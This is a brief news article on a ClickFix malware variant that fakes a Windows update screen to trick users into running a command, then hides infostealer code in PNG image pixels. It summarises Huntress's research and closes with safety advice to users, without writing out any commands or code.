Fake Windows update steals passwords and crypto wallets

A new version of the ClickFix malware is posing as a legitimate Windows update. Using code hidden in PNG files, attackers are stealing passwords, crypto wallets, and other sensitive data. Researchers are warning about the dangers of fake websites and urging greater caution.

Photo: Lenovo

Cybercriminals have updated the notorious ClickFix malware to now pretend to be a legitimate Windows update, tricking users into pasting malicious code into the Run window. What makes this attack particularly clever is that it uses pixel data from a PNG file to trigger malicious code that steals usernames, passwords, crypto wallets, banking details, and other sensitive information.

Researchers at Huntress recently uncovered a new variant of ClickFix. It displays a fake full-screen browser window that mimics a Windows update, complete with a progress bar stuck at 95 percent for a supposed “critical security update.” The malware is most commonly found on fake adult websites that mimic popular portals, often in the form of advertisements or age verification prompts. Clicking on such an element triggers the fake update window.

Users are then prompted to press Windows + R, paste the malicious code, unknowingly granting the cyber attackers access with administrative privileges. The command launches the mshta (Microsoft HTML Application Host) program with a malicious URL, which downloads additional code from the hexadecimal source. PowerShell scripts are then run, confusing security programs such as Bitdefender, and decrypting the PNG file, from which shell commands are extracted, which are injected into already running processes.

Although PNG appears harmless, its pixels contain encrypted malicious code. Once decrypted, infostealers such as Rhadamanthys or LummaC2 are triggered, collecting passwords, credentials, and crypto wallet data and sending them to foreign servers.

Huntress reports that this variant has been spreading since early October, with many domains still hosting the fake update window. The hackers further obscure the code with random lines or even strange quotes, including from a UN disarmament meeting.

ClickFix is one of the most sophisticated forms of data-stealing malware ever. Experts advise users to check domain URLs, avoid suspicious ads, and never enter unknown commands into their devices.